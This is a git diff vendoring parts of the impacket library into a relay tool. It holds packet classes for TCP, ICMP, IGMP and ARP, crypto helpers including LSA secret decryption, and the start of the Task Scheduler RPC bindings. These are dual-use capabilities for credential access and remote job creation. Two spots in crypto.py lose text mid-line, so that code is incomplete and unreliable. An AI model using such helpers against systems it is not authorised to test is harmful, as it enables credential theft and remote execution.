get_mss(self): + if self.get_kind() != TCPOption.TCPOPT_MAXSEG: + raise ImpactPacketException("Can only retrieve MSS from TCPOPT_MAXSEG option") + return self.get_word(2) + + def set_shift_cnt(self, cnt): + if self.get_kind() != TCPOption.TCPOPT_WINDOW: + raise ImpactPacketException("Can only set Shift Count on TCPOPT_WINDOW option") + self.set_byte(2, cnt) + + def get_shift_cnt(self): + if self.get_kind() != TCPOption.TCPOPT_WINDOW: + raise ImpactPacketException("Can only retrieve Shift Count from TCPOPT_WINDOW option") + return self.get_byte(2) + + def get_ts(self): + if self.get_kind() != TCPOption.TCPOPT_TIMESTAMP: + raise ImpactPacketException("Can only retrieve timestamp from TCPOPT_TIMESTAMP option") + return self.get_long(2) + + def set_ts(self, ts): + if self.get_kind() != TCPOption.TCPOPT_TIMESTAMP: + raise ImpactPacketException("Can only set timestamp on TCPOPT_TIMESTAMP option") + self.set_long(2, ts) + + def get_ts_echo(self): + if self.get_kind() != TCPOption.TCPOPT_TIMESTAMP: + raise ImpactPacketException("Can only retrieve timestamp from TCPOPT_TIMESTAMP option") + return self.get_long(6) + + def set_ts_echo(self, ts): + if self.get_kind() != TCPOption.TCPOPT_TIMESTAMP: + raise ImpactPacketException("Can only set timestamp on TCPOPT_TIMESTAMP option") + self.set_long(6, ts) + + def __str__(self): + map = { TCPOption.TCPOPT_EOL : "End of List ", + TCPOption.TCPOPT_NOP : "No Operation ", + TCPOption.TCPOPT_MAXSEG : "Maximum Segment Size ", + TCPOption.TCPOPT_WINDOW : "Window Scale ", + TCPOption.TCPOPT_TIMESTAMP : "Timestamp " } + + tmp_str = "\tTCP Option: " + op = self.get_kind() + if op in map: + tmp_str += map[op] + else: + tmp_str += " kind: %d " % op + if op == TCPOption.TCPOPT_MAXSEG: + tmp_str += " MSS : %d " % self.get_mss() + elif op == TCPOption.TCPOPT_WINDOW: + tmp_str += " Shift Count: %d " % self.get_shift_cnt() + elif op == TCPOption.TCPOPT_TIMESTAMP: + pass # TODO + return tmp_str + +class ICMP(Header): + protocol = 1 + ICMP_ECHOREPLY = 0 + ICMP_UNREACH = 3 + ICMP_UNREACH_NET = 0 + ICMP_UNREACH_HOST = 1 + ICMP_UNREACH_PROTOCOL = 2 + ICMP_UNREACH_PORT = 3 + ICMP_UNREACH_NEEDFRAG = 4 + ICMP_UNREACH_SRCFAIL = 5 + ICMP_UNREACH_NET_UNKNOWN = 6 + ICMP_UNREACH_HOST_UNKNOWN = 7 + ICMP_UNREACH_ISOLATED = 8 + ICMP_UNREACH_NET_PROHIB = 9 + ICMP_UNREACH_HOST_PROHIB = 10 + ICMP_UNREACH_TOSNET = 11 + ICMP_UNREACH_TOSHOST = 12 + ICMP_UNREACH_FILTERPROHIB = 13 + ICMP_UNREACH_HOST_PRECEDENCE = 14 + ICMP_UNREACH_PRECEDENCE_CUTOFF = 15 + ICMP_SOURCEQUENCH = 4 + ICMP_REDIRECT = 5 + ICMP_REDIRECT_NET = 0 + ICMP_REDIRECT_HOST = 1 + ICMP_REDIRECT_TOSNET = 2 + ICMP_REDIRECT_TOSHOST = 3 + ICMP_ALTHOSTADDR = 6 + ICMP_ECHO = 8 + ICMP_ROUTERADVERT = 9 + ICMP_ROUTERSOLICIT = 10 + ICMP_TIMXCEED = 11 + ICMP_TIMXCEED_INTRANS = 0 + ICMP_TIMXCEED_REASS = 1 + ICMP_PARAMPROB = 12 + ICMP_PARAMPROB_ERRATPTR = 0 + ICMP_PARAMPROB_OPTABSENT = 1 + ICMP_PARAMPROB_LENGTH = 2 + ICMP_TSTAMP = 13 + ICMP_TSTAMPREPLY = 14 + ICMP_IREQ = 15 + ICMP_IREQREPLY = 16 + ICMP_MASKREQ = 17 + ICMP_MASKREPLY = 18 + + def __init__(self, aBuffer = None): + Header.__init__(self, 8) + if aBuffer: + self.load_header(aBuffer) + + def get_header_size(self): + anamolies = { ICMP.ICMP_TSTAMP : 20, ICMP.ICMP_TSTAMPREPLY : 20, ICMP.ICMP_MASKREQ : 12, ICMP.ICMP_MASKREPLY : 12 } + if self.get_icmp_type() in anamolies: + return anamolies[self.get_icmp_type()] + else: + return 8 + + def get_icmp_type(self): + return self.get_byte(0) + + def set_icmp_type(self, aValue): + self.set_byte(0, aValue) + + def get_icmp_code(self): + return self.get_byte(1) + + def set_icmp_code(self, aValue): + self.set_byte(1, aValue) + + def get_icmp_cksum(self): + return self.get_word(2) + + def set_icmp_cksum(self, aValue): + self.set_word(2, aValue) + self.auto_checksum = 0 + + def get_icmp_gwaddr(self): + return self.get_ip_address(4) + + def set_icmp_gwaddr(self, ip): + self.set_ip_address(4, ip) + + def get_icmp_id(self): + return self.get_word(4) + + def set_icmp_id(self, aValue): + self.set_word(4, aValue) + + def get_icmp_seq(self): + return self.get_word(6) + + def set_icmp_seq(self, aValue): + self.set_word(6, aValue) + + def get_icmp_void(self): + return self.get_long(4) + + def set_icmp_void(self, aValue): + self.set_long(4, aValue) + + + def get_icmp_nextmtu(self): + return self.get_word(6) + + def set_icmp_nextmtu(self, aValue): + self.set_word(6, aValue) + + def get_icmp_num_addrs(self): + return self.get_byte(4) + + def set_icmp_num_addrs(self, aValue): + self.set_byte(4, aValue) + + def get_icmp_wpa(self): + return self.get_byte(5) + + def set_icmp_wpa(self, aValue): + self.set_byte(5, aValue) + + def get_icmp_lifetime(self): + return self.get_word(6) + + def set_icmp_lifetime(self, aValue): + self.set_word(6, aValue) + + def get_icmp_otime(self): + return self.get_long(8) + + def set_icmp_otime(self, aValue): + self.set_long(8, aValue) + + def get_icmp_rtime(self): + return self.get_long(12) + + def set_icmp_rtime(self, aValue): + self.set_long(12, aValue) + + def get_icmp_ttime(self): + return self.get_long(16) + + def set_icmp_ttime(self, aValue): + self.set_long(16, aValue) + + def get_icmp_mask(self): + return self.get_ip_address(8) + + def set_icmp_mask(self, mask): + self.set_ip_address(8, mask) + + + def calculate_checksum(self): + if self.auto_checksum and (not self.get_icmp_cksum()): + buffer = self.get_buffer_as_string() + data = self.get_data_as_string() + if data: + buffer += data + + tmp_array = array.array('B', buffer) + self.set_icmp_cksum(self.compute_checksum(tmp_array)) + + def get_type_name(self, aType): + tmp_type = {0:'ECHOREPLY', 3:'UNREACH', 4:'SOURCEQUENCH',5:'REDIRECT', 6:'ALTHOSTADDR', 8:'ECHO', 9:'ROUTERADVERT', 10:'ROUTERSOLICIT', 11:'TIMXCEED', 12:'PARAMPROB', 13:'TSTAMP', 14:'TSTAMPREPLY', 15:'IREQ', 16:'IREQREPLY', 17:'MASKREQ', 18:'MASKREPLY', 30:'TRACEROUTE', 31:'DATACONVERR', 32:'MOBILE REDIRECT', 33:'IPV6 WHEREAREYOU', 34:'IPV6 IAMHERE', 35:'MOBILE REGREQUEST', 36:'MOBILE REGREPLY', 39:'SKIP', 40:'PHOTURIS'} + answer = tmp_type.get(aType, 'UNKNOWN') + return answer + + def get_code_name(self, aType, aCode): + tmp_code = {3:['UNREACH NET', 'UNREACH HOST', 'UNREACH PROTOCOL', 'UNREACH PORT', 'UNREACH NEEDFRAG', 'UNREACH SRCFAIL', 'UNREACH NET UNKNOWN', 'UNREACH HOST UNKNOWN', 'UNREACH ISOLATED', 'UNREACH NET PROHIB', 'UNREACH HOST PROHIB', 'UNREACH TOSNET', 'UNREACH TOSHOST', 'UNREACH FILTER PROHIB', 'UNREACH HOST PRECEDENCE', 'UNREACH PRECEDENCE CUTOFF', 'UNKNOWN ICMP UNREACH']} + tmp_code[5] = ['REDIRECT NET', 'REDIRECT HOST', 'REDIRECT TOSNET', 'REDIRECT TOSHOST'] + tmp_code[9] = ['ROUTERADVERT NORMAL', None, None, None, None, None, None, None, None, None, None, None, None, None, None, None,'ROUTERADVERT NOROUTE COMMON'] + tmp_code[11] = ['TIMXCEED INTRANS ', 'TIMXCEED REASS'] + tmp_code[12] = ['PARAMPROB ERRATPTR ', 'PARAMPROB OPTABSENT', 'PARAMPROB LENGTH'] + tmp_code[40] = [None, 'PHOTURIS UNKNOWN INDEX', 'PHOTURIS AUTH FAILED', 'PHOTURIS DECRYPT FAILED'] + if aType in tmp_code: + tmp_list = tmp_code[aType] + if ((aCode + 1) > len(tmp_list)) or (not tmp_list[aCode]): + return 'UNKNOWN' + else: + return tmp_list[aCode] + else: + return 'UNKNOWN' + + def __str__(self): + tmp_type = self.get_icmp_type() + tmp_code = self.get_icmp_code() + tmp_str = 'ICMP type: ' + self.get_type_name(tmp_type) + tmp_str+= ' code: ' + self.get_code_name(tmp_type, tmp_code) + if self.child(): + tmp_str += '\n' + str( self.child() ) + return tmp_str + + def isDestinationUnreachable(self): + return self.get_icmp_type() == 3 + + def isError(self): + return not self.isQuery() + + def isHostUnreachable(self): + return self.isDestinationUnreachable() and (self.get_icmp_code() == 1) + + def isNetUnreachable(self): + return self.isDestinationUnreachable() and (self.get_icmp_code() == 0) + + def isPortUnreachable(self): + return self.isDestinationUnreachable() and (self.get_icmp_code() == 3) + + def isProtocolUnreachable(self): + return self.isDestinationUnreachable() and (self.get_icmp_code() == 2) + + def isQuery(self): + tmp_dict = {8:'', 9:'', 10:'', 13:'', 14:'', 15:'', 16:'', 17:'', 18:''} + return self.get_icmp_type() in tmp_dict + +class IGMP(Header): + protocol = 2 + def __init__(self, aBuffer = None): + Header.__init__(self, 8) + if aBuffer: + self.load_header(aBuffer) + + def get_igmp_type(self): + return self.get_byte(0) + + def set_igmp_type(self, aValue): + self.set_byte(0, aValue) + + def get_igmp_code(self): + return self.get_byte(1) + + def set_igmp_code(self, aValue): + self.set_byte(1, aValue) + + def get_igmp_cksum(self): + return self.get_word(2) + + def set_igmp_cksum(self, aValue): + self.set_word(2, aValue) + + def get_igmp_group(self): + return self.get_long(4) + + def set_igmp_group(self, aValue): + self.set_long(4, aValue) + + def get_header_size(self): + return 8 + + def get_type_name(self, aType): + tmp_dict = {0x11:'HOST MEMBERSHIP QUERY ', 0x12:'v1 HOST MEMBERSHIP REPORT ', 0x13:'IGMP DVMRP ', 0x14:' PIM ', 0x16:'v2 HOST MEMBERSHIP REPORT ', 0x17:'HOST LEAVE MESSAGE ', 0x1e:'MTRACE REPLY ', 0X1f:'MTRACE QUERY '} + answer = tmp_dict.get(aType, 'UNKNOWN TYPE OR VERSION ') + return answer + + def calculate_checksum(self): + if self.auto_checksum and (not self.get_igmp_cksum()): + self.set_igmp_cksum(self.compute_checksum(self.get_bytes())) + + def __str__(self): + tmp_str = 'IGMP: ' + self.get_type_name(self.get_igmp_type()) + tmp_str += 'Group: ' + socket.inet_ntoa(struct.pack('!L',self.get_igmp_group())) + if self.child(): + tmp_str += '\n' + str(self.child()) + return tmp_str + + + +class ARP(Header): + ethertype = 0x806 + def __init__(self, aBuffer = None): + Header.__init__(self, 7) + if aBuffer: + self.load_header(aBuffer) + + def get_ar_hrd(self): + return self.get_word(0) + + def set_ar_hrd(self, aValue): + self.set_word(0, aValue) + + def get_ar_pro(self): + return self.get_word(2) + + def set_ar_pro(self, aValue): + self.set_word(2, aValue) + + def get_ar_hln(self): + return self.get_byte(4) + + def set_ar_hln(self, aValue): + self.set_byte(4, aValue) + + def get_ar_pln(self): + return self.get_byte(5) + + def set_ar_pln(self, aValue): + self.set_byte(5, aValue) + + def get_ar_op(self): + return self.get_word(6) + + def set_ar_op(self, aValue): + self.set_word(6, aValue) + + def get_ar_sha(self): + tmp_size = self.get_ar_hln() + return self.get_bytes().tolist()[8: 8 + tmp_size] + + def set_ar_sha(self, aValue): + for i in range(0, self.get_ar_hln()): + self.set_byte(i + 8, aValue[i]) + + def get_ar_spa(self): + tmp_size = self.get_ar_pln() + return self.get_bytes().tolist()[8 + self.get_ar_hln(): 8 + self.get_ar_hln() + tmp_size] + + def set_ar_spa(self, aValue): + for i in range(0, self.get_ar_pln()): + self.set_byte(i + 8 + self.get_ar_hln(), aValue[i]) + + def get_ar_tha(self): + tmp_size = self.get_ar_hln() + tmp_from = 8 + self.get_ar_hln() + self.get_ar_pln() + return self.get_bytes().tolist()[tmp_from: tmp_from + tmp_size] + + def set_ar_tha(self, aValue): + tmp_from = 8 + self.get_ar_hln() + self.get_ar_pln() + for i in range(0, self.get_ar_hln()): + self.set_byte(i + tmp_from, aValue[i]) + + def get_ar_tpa(self): + tmp_size = self.get_ar_pln() + tmp_from = 8 + ( 2 * self.get_ar_hln()) + self.get_ar_pln() + return self.get_bytes().tolist()[tmp_from: tmp_from + tmp_size] + + def set_ar_tpa(self, aValue): + tmp_from = 8 + (2 * self.get_ar_hln()) + self.get_ar_pln() + for i in range(0, self.get_ar_pln()): + self.set_byte(i + tmp_from, aValue[i]) + + def get_header_size(self): + return 8 + (2 * self.get_ar_hln()) + (2 * self.get_ar_pln()) + + def get_op_name(self, ar_op): + tmp_dict = {1:'REQUEST', 2:'REPLY', 3:'REVREQUEST', 4:'REVREPLY', 8:'INVREQUEST', 9:'INVREPLY'} + answer = tmp_dict.get(ar_op, 'UNKNOWN') + return answer + + def get_hrd_name(self, ar_hrd): + tmp_dict = { 1:'ARPHRD ETHER', 6:'ARPHRD IEEE802', 15:'ARPHRD FRELAY'} + answer = tmp_dict.get(ar_hrd, 'UNKNOWN') + return answer + + + def as_hrd(self, anArray): + if not anArray: + return '' + tmp_str = '%x' % anArray[0] + for i in range(1, len(anArray)): + tmp_str += ':%x' % anArray[i] + return tmp_str + + def as_pro(self, anArray): + if not anArray: + return '' + tmp_str = '%d' % anArray[0] + for i in range(1, len(anArray)): + tmp_str += '.%d' % anArray[i] + return tmp_str + + def __str__(self): + tmp_op = self.get_ar_op() + tmp_str = 'ARP format: ' + self.get_hrd_name(self.get_ar_hrd()) + ' ' + tmp_str += 'opcode: ' + self.get_op_name(tmp_op) + tmp_str += '\n' + self.as_hrd(self.get_ar_sha()) + ' -> ' + tmp_str += self.as_hrd(self.get_ar_tha()) + tmp_str += '\n' + self.as_pro(self.get_ar_spa()) + ' -> ' + tmp_str += self.as_pro(self.get_ar_tpa()) + if self.child(): + tmp_str += '\n' + str(self.child()) + return tmp_str + +def example(): #To execute an example, remove this line + a = Ethernet() + b = ARP() + c = Data('Hola loco!!!') + b.set_ar_hln(6) + b.set_ar_pln(4) + #a.set_ip_dst('192.168.22.6') + #a.set_ip_src('1.1.1.2') + a.contains(b) + b.contains(c) + b.set_ar_op(2) + b.set_ar_hrd(1) + b.set_ar_spa((192, 168, 22, 6)) + b.set_ar_tpa((192, 168, 66, 171)) + a.set_ether_shost((0x0, 0xe0, 0x7d, 0x8a, 0xef, 0x3d)) + a.set_ether_dhost((0x0, 0xc0, 0xdf, 0x6, 0x5, 0xe)) + print("beto %s" % a) diff --git a/tools/MultiRelay/impacket-dev/impacket/__init__.py b/tools/MultiRelay/impacket-dev/impacket/__init__.py new file mode 100644 index 0000000..92a5d6b --- /dev/null +++ b/tools/MultiRelay/impacket-dev/impacket/__init__.py @@ -0,0 +1,25 @@ +# Copyright (c) 2003-2016 CORE Security Technologies +# +# This software is provided under under a slightly modified version +# of the Apache Software License. See the accompanying LICENSE file +# for more information. +# +# Author: Alberto Solino (@agsolino) +# + +# Set default logging handler to avoid "No handler found" warnings. +import logging +try: # Python 2.7+ + from logging import NullHandler +except ImportError: + class NullHandler(logging.Handler): + def emit(self, record): + pass + +# All modules inside this library MUST use this logger (impacket) +# It is up to the library consumer to do whatever is wanted +# with the logger output. By default it is forwarded to the +# upstream logger + +LOG = logging.getLogger(__name__) +LOG.addHandler(NullHandler()) diff --git a/tools/MultiRelay/impacket-dev/impacket/crypto.py b/tools/MultiRelay/impacket-dev/impacket/crypto.py new file mode 100644 index 0000000..9760426 --- /dev/null +++ b/tools/MultiRelay/impacket-dev/impacket/crypto.py @@ -0,0 +1,346 @@ +# SECUREAUTH LABS. Copyright 2018 SecureAuth Corporation. All rights reserved. +# +# This software is provided under under a slightly modified version +# of the Apache Software License. See the accompanying LICENSE file +# for more information. +# +# Author: Alberto Solino (beto@coresecurity.com) +# +# Description: +# RFC 4493 implementation (https://www.ietf.org/rfc/rfc4493.txt) +# RFC 4615 implementation (https://www.ietf.org/rfc/rfc4615.txt) +# +# NIST SP 800-108 Section 5.1, with PRF HMAC-SHA256 implementation +# (https://tools.ietf.org/html/draft-irtf-cfrg-kdf-uses-00#ref-SP800-108) +# +# [MS-LSAD] Section 5.1.2 +# [MS-SAMR] Section 2.2.11.1.1 + +from __future__ import division +from __future__ import print_function +from impacket import LOG +try: + from Cryptodome.Cipher import DES, AES +except Exception: + LOG.error("Warning: You don't have any crypto installed. You need pycryptodomex") + LOG.error("See https://pypi.org/project/pycryptodomex/") +from struct import pack, unpack +from impacket.structure import Structure +import hmac, hashlib +from six import b + +def Generate_Subkey(K): + +# +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ +# + Algorithm Generate_Subkey + +# +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ +# + + +# + Input : K (128-bit key) + +# + Output : K1 (128-bit first subkey) + +# + K2 (128-bit second subkey) + +# +-------------------------------------------------------------------+ +# + + +# + Constants: const_Zero is 0x00000000000000000000000000000000 + +# + const_Rb is 0x00000000000000000000000000000087 + +# + Variables: L for output of AES-128 applied to 0^128 + +# + + +# + Step 1. L := AES-128(K, const_Zero); + +# + Step 2. if MSB(L) is equal to 0 + +# + then K1 := L << 1; + +# + else K1 := (L << 1) XOR const_Rb; + +# + Step 3. if MSB(K1) is equal to 0 + +# + then K2 := K1 << 1; + +# + else K2 := (K1 << 1) XOR const_Rb; + +# + Step 4. return K1, K2; + +# + + +# +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ + + AES_128 = AES.new(K, AES.MODE_ECB) + + L = AES_128.encrypt(bytes(bytearray(16))) + + LHigh = unpack('>Q',L[:8])[0] + LLow = unpack('>Q',L[8:])[0] + + K1High = ((LHigh << 1) | ( LLow >> 63 )) & 0xFFFFFFFFFFFFFFFF + K1Low = (LLow << 1) & 0xFFFFFFFFFFFFFFFF + + if (LHigh >> 63): + K1Low ^= 0x87 + + K2High = ((K1High << 1) | (K1Low >> 63)) & 0xFFFFFFFFFFFFFFFF + K2Low = ((K1Low << 1)) & 0xFFFFFFFFFFFFFFFF + + if (K1High >> 63): + K2Low ^= 0x87 + + K1 = bytearray(pack('>QQ', K1High, K1Low)) + K2 = bytearray(pack('>QQ', K2High, K2Low)) + + return K1, K2 + +def XOR_128(N1,N2): + + J = bytearray() + for i in range(len(N1)): + #J.append(indexbytes(N1,i) ^ indexbytes(N2,i)) + J.append(N1[i] ^ N2[i]) + return J + +def PAD(N): + padLen = 16-len(N) + return N + b'\x80' + b'\x00'*(padLen-1) + +def AES_CMAC(K, M, length): + +# +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ +# + Algorithm AES-CMAC + +# +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ +# + + +# + Input : K ( 128-bit key ) + +# + : M ( message to be authenticated ) + +# + : len ( length of the message in octets ) + +# + Output : T ( message authentication code ) + +# + + +# +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ +# + Constants: const_Zero is 0x00000000000000000000000000000000 + +# + const_Bsize is 16 + +# + + +# + Variables: K1, K2 for 128-bit subkeys + +# + M_i is the i-th block (i=1..ceil(len/const_Bsize)) + +# + M_last is the last block xor-ed with K1 or K2 + +# + n for number of blocks to be processed + +# + r for number of octets of last block + +# + flag for denoting if last block is complete or not + +# + + +# + Step 1. (K1,K2) := Generate_Subkey(K); + +# + Step 2. n := ceil(len/const_Bsize); + +# + Step 3. if n = 0 + +# + then + +# + n := 1; + +# + flag := false; + +# + else + +# + if len mod const_Bsize is 0 + +# + then flag := true; + +# + else flag := false; + +# + + +# + Step 4. if flag is true + +# + then M_last := M_n XOR K1; + +# + else M_last := padding(M_n) XOR K2; + +# + Step 5. X := const_Zero; + +# + Step 6. for i := 1 to n-1 do + +# + begin + +# + Y := X XOR M_i; + +# + X := AES-128(K,Y); + +# + end + +# + Y := M_last XOR X; + +# + T := AES-128(K,Y); + +# + Step 7. return T; + +# +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ + + const_Bsize = 16 + const_Zero = bytearray(16) + + AES_128= AES.new(K, AES.MODE_ECB) + M = bytearray(M[:length]) + K1, K2 = Generate_Subkey(K) + n = len(M)//const_Bsize + + if n == 0: + n = 1 + flag = False + else: + if (length % const_Bsize) == 0: + flag = True + else: + n += 1 + flag = False + + M_n = M[(n-1)*const_Bsize:] + if flag is True: + M_last = XOR_128(M_n,K1) + else: + M_last = XOR_128(PAD(M_n),K2) + + X = const_Zero + for i in range(n-1): + M_i = M[(i)*const_Bsize:][:16] + Y = XOR_128(X, M_i) + X = bytearray(AES_128.encrypt(bytes(Y))) + Y = XOR_128(M_last, X) + T = AES_128.encrypt(bytes(Y)) + + return T + +def AES_CMAC_PRF_128(VK, M, VKlen, Mlen): +# +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ +# + AES-CMAC-PRF-128 + +# +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ +# + + +# + Input : VK (Variable-length key) + +# + : M (Message, i.e., the input data of the PRF) + +# + : VKlen (length of VK in octets) + +# + : len (length of M in octets) + +# + Output : PRV (128-bit Pseudo-Random Variable) + +# + + +# +-------------------------------------------------------------------+ +# + Variable: K (128-bit key for AES-CMAC) + +# + + +# + Step 1. If VKlen is equal to 16 + +# + Step 1a. then + +# + K := VK; + +# + Step 1b. else + +# + K := AES-CMAC(0^128, VK, VKlen); + +# + Step 2. PRV := AES-CMAC(K, M, len); + +# + return PRV; + +# + + +# +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ + if VKlen == 16: + K = VK + else: + K = AES_CMAC(bytes(bytearray(16)), VK, VKlen) + + PRV = AES_CMAC(K, M, Mlen) + + return PRV + +def KDF_CounterMode(KI, Label, Context, L): +# Implements NIST SP 800-108 Section 5.1, with PRF HMAC-SHA256 +# https://tools.ietf.org/html/draft-irtf-cfrg-kdf-uses-00#ref-SP800-108 +# Fixed values: +# 1. h - The length of the output of the PRF in bits, and +# 2. r - The length of the binary representation of the counter i. +# Input: KI, Label, Context, and L. +# Process: +# 1. n := [L/h] +# 2. If n > 2r-1, then indicate an error and stop. +# 3. result(0):= empty . +# 4. For i = 1 to n, do +# a. K(i) := PRF (KI, [i]2 || Label || 0x00 || Context || [L]2) +# b. result(i) := result(i-1) || K(i). +# 5. Return: KO := the leftmost L bits of result(n). + h = 256 + r = 32 + + n = L // h + + if n == 0: + n = 1 + + if n > (pow(2,r)-1): + raise Exception("Error computing KDF_CounterMode") + + result = b'' + K = b'' + + for i in range(1,n+1): + input = pack('>L', i) + Label + b'\x00' + Context + pack('>L',L) + K = hmac.new(KI, input, hashlib.sha256).digest() + result = result + K + + return result[:(L//8)] + +# [MS-LSAD] Section 5.1.2 / 5.1.3 +class LSA_SECRET_XP(Structure): + structure = ( + ('Length','> 0x01) ) + OutputKey.append( chr(((ord(InputKey[0:1])&0x01)<<6) | (ord(InputKey[1:2])>>2)) ) + OutputKey.append( chr(((ord(InputKey[1:2])&0x03)<<5) | (ord(InputKey[2:3])>>3)) ) + OutputKey.append( chr(((ord(InputKey[2:3])&0x07)<<4) | (ord(InputKey[3:4])>>4)) ) + OutputKey.append( chr(((ord(InputKey[3:4])&0x0F)<<3) | (ord(InputKey[4:5])>>5)) ) + OutputKey.append( chr(((ord(InputKey[4:5])&0x1F)<<2) | (ord(InputKey[5:6])>>6)) ) + OutputKey.append( chr(((ord(InputKey[5:6])&0x3F)<<1) | (ord(InputKey[6:7])>>7)) ) + OutputKey.append( chr(ord(InputKey[6:7]) & 0x7F) ) + + for i in range(8): + OutputKey[i] = chr((ord(OutputKey[i]) << 1) & 0xfe) + + return b("".join(OutputKey)) + +def decryptSecret(key, value): + # [MS-LSAD] Section 5.1.2 + plainText = b'' + key0 = key + for i in range(0, len(value), 8): + cipherText = value[:8] + tmpStrKey = key0[:7] + tmpKey = transformKey(tmpStrKey) + Crypt1 = DES.new(tmpKey, DES.MODE_ECB) + plainText += Crypt1.decrypt(cipherText) + key0 = key0[7:] + value = value[8:] + # AdvanceKey + if len(key0) < 7: + key0 = key[len(key0):] + + secret = LSA_SECRET_XP(plainText) + return (secret['Secret']) + +def encryptSecret(key, value): + # [MS-LSAD] Section 5.1.2 + cipherText = b'' + key0 = key + value0 = pack('. +# There are test cases for them too. +# +from impacket.dcerpc.v5.ndr import NDRCALL, NDRSTRUCT, NDRPOINTER, NDRUniConformantArray +from impacket.dcerpc.v5.dtypes import DWORD, LPWSTR, UCHAR, ULONG, LPDWORD, NULL +from impacket import hresult_errors +from impacket.uuid import uuidtup_to_bin +from impacket.dcerpc.v5.rpcrt import DCERPCException + +MSRPC_UUID_ATSVC = uuidtup_to_bin(('1FF70682-0A51-30E8-076D-740BE8CEE98B','1.0')) + +class DCERPCSessionError(DCERPCException): + def __init__(self, error_string=None, error_code=None, packet=None): + DCERPCException.__init__(self, error_string, error_code, packet) + + def __str__( self ): + key = self.error_code + if key in hresult_errors.ERROR_MESSAGES: + error_msg_short = hresult_errors.ERROR_MESSAGES[key][0] + error_msg_verbose = hresult_errors.ERROR_MESSAGES[key][1] + return 'TSCH SessionError: code: 0x%x - %s - %s' % (self.error_code, error_msg_short, error_msg_verbose) + else: + return 'TSCH SessionError: unknown error code: 0x%x' % self.error_code + +################################################################################ +# CONSTANTS +################################################################################ +ATSVC_HANDLE = LPWSTR +# 2.3.1 Constant Values +CNLEN = 15 +DNLEN = CNLEN +UNLEN = 256 +MAX_BUFFER_SIZE = (DNLEN+UNLEN+1+1) + +# 2.3.7 Flags +TASK_FLAG_INTERACTIVE = 0x1 +TASK_FLAG_DELETE_WHEN_DONE = 0x2 +TASK_FLAG_DISABLED = 0x4 +TASK_FLAG_START_ONLY_IF_IDLE = 0x10 +TASK_FLAG_KILL_ON_IDLE_END = 0x20 +TASK_FLAG_DONT_START_IF_ON_BATTERIES = 0x40 +TASK_FLAG_KILL_IF_GOING_ON_BATTERIES = 0x80 +TASK_FLAG_RUN_ONLY_IF_DOCKED = 0x100 +TASK_FLAG_HIDDEN = 0x200 +TASK_FLAG_RUN_IF_CONNECTED_TO_INTERNET = 0x400 +TASK_FLAG_RESTART_ON_IDLE_RESUME = 0x800 +TASK_FLAG_SYSTEM_REQUIRED = 0x1000 +TASK_FLAG_RUN_ONLY_IF_LOGGED_ON = 0x2000 + +################################################################################ +# STRUCTURES +################################################################################ +# 2.3.4 AT_INFO +class AT_INFO(NDRSTRUCT): + structure = ( + ('JobTime',DWORD), + ('DaysOfMonth',DWORD), + ('DaysOfWeek',UCHAR), + ('Flags',UCHAR), + ('Command',LPWSTR), + ) + +class LPAT_INFO(NDRPOINTER): + referent = ( + ('Data',AT_INFO), + ) + +# 2.3.6 AT_ENUM +class AT_ENUM(NDRSTRUCT): + structure = ( + ('JobId',DWORD), + ('JobTime',DWORD), + ('DaysOfMonth',DWORD), + ('DaysOfWeek',UCHAR), + ('Flags',UCHAR), + ('Command',LPWSTR), + ) + +class AT_ENUM_ARRAY(NDRUniConformantArray): + item = AT_ENUM + +class LPAT_ENUM_ARRAY(NDRPOINTER): + referent = ( + ('Data',AT_ENUM_ARRAY), + ) + +# 2.3.5 AT_ENUM_CONTAINER +class AT_ENUM_CONTAINER(NDRSTRUCT): + structure = ( + ('EntriesRead',DWORD), + ('Buffer',LPAT_ENUM_ARRAY), + ) + +################################################################################ +# RPC CALLS +################################################################################ +# 3.2.5.2.1 NetrJobAdd (Opnum 0) +class NetrJobAdd(NDRCALL): + opnum = 0 + structure = ( + ('ServerName',ATSVC_HANDLE), + ('pAtInfo', AT_INFO), + ) + +class NetrJobAddResponse(NDRCALL): + structure = ( + ('pJobId',DWORD), + ('ErrorCode',ULONG), + ) + +# 3.2.5.2.2 NetrJobDel (Opnum 1) +class NetrJobDel(NDRCALL): + opnum = 1 + structure = ( + ('ServerName',ATSVC_HANDLE), + ('MinJobId', DWORD), + ('MaxJobId', DWORD), + ) + +class NetrJobDelResponse(NDRCALL): + structure = ( + ('ErrorCode',ULONG), + ) + +# 3.2.5.2.3 NetrJobEnum (Opnum 2) +class NetrJobEnum(NDRCALL): + opnum = 2 + structure = ( + ('ServerName',ATSVC_HANDLE), + ('pEnumContainer', AT_ENUM_CONTAINER), + ('PreferedMaximumLength', DWORD), + ('pResumeHandle', DWORD), + ) + +class NetrJobEnumResponse(NDRCALL): + structure = ( + ('pEnumContainer', AT_ENUM_CONTAINER), + ('pTotalEntries', DWORD), + ('pResumeHandle',LPDWORD), + ('ErrorCode',ULONG), + ) + +# 3.2.5.2.4 NetrJobGetInfo (Opnum 3) +class NetrJobGetInfo(NDRCALL): + opnum = 3 + structure = ( + ('ServerName',ATSVC_HANDLE), + ('JobId', DWORD), + ) + +class NetrJobGetInfoResponse(NDRCALL): + structure = ( + ('ppAtInfo', LPAT_INFO), + ('ErrorCode',ULONG), + ) + +################################################################################ +# OPNUMs and their corresponding structures +################################################################################ +OPNUMS = { + 0 : (NetrJobAdd,NetrJobAddResponse ), + 1 : (NetrJobDel,NetrJobDelResponse ), + 2 : (NetrJobEnum,NetrJobEnumResponse ), + 3 : (NetrJobGetInfo,NetrJobGetInfoResponse ), +} + +################################################################################ +# HELPER FUNCTIONS +################################################################################ +def hNetrJobAdd(dce, serverName = NULL, atInfo = NULL): + netrJobAdd = NetrJobAdd() + netrJobAdd['ServerName'] = serverName + netrJobAdd['pAtInfo'] = atInfo + return dce.request(netrJobAdd) + +def hNetrJobDel(dce, serverName = NULL, minJobId = 0, maxJobId = 0): + netrJobDel = NetrJobDel() + netrJobDel['ServerName'] = serverName + netrJobDel['MinJobId'] = minJobId + netrJobDel['MaxJobId'] = 